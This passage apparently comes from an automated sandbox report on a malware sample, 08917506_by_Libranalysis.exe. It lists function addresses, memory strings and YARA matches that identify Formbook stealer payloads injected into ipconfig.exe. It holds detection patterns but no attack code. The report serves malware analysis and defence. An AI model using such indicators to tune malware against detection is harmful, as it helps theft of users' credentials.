          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_016425DD
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A2581
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0163D466
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0158841F
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01641FF1
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0164DFCE
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01596E30
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0163D616
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01642EF7
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E228EC
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D6B090
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E220A8
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D820A0
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E11002
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D5F900
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D74120
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E222AE
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E1DBD2
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D8EBB0
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E22B28
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E1D466
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D6841F
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D6D5E0
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E225DD
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D82581
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E21D55
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E22D07
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D50D20
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E22EF7
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D76E30
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E1D616
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E21FF1
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003CCAC5
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003B8C50
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003CC4E5
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003B2D90
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003CC742
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003B2FB0
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: String function: 0157B150 appears 48 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 00D5B150 appears 35 times
          Source: 08917506_by_Libranalysis.exe | Binary or memory string: OriginalFilename vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.261415495.00000000094D0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameDSASignature.dll@ vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.257338914.00000000076E0000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.257338914.00000000076E0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exe, 00000000.00000000.227243971.0000000000FC2000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameNotFiniteNumberException.exeB vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252059704.0000000003631000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSimpleUI.dll( vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.258531380.0000000008BE0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameIEFRAME.DLLD vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.260684849.0000000009280000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.258654930.0000000008C00000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.256930094.00000000075F0000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exe, 00000005.00000002.294838186.0000000000B22000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameNotFiniteNumberException.exeB vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exe, 00000005.00000002.295432403.00000000017FF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exe, 00000005.00000002.295601970.0000000003157000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameipconfig.exej% vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exe | Binary or memory string: OriginalFilenameNotFiniteNumberException.exeB vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.495362707.0000000000B90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.495362707.0000000000B90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.492372341.00000000003B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.492372341.00000000003B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.495228855.0000000000B50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.495228855.0000000000B50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.295106715.0000000001520000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.295106715.0000000001520000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.294777794.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.294777794.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal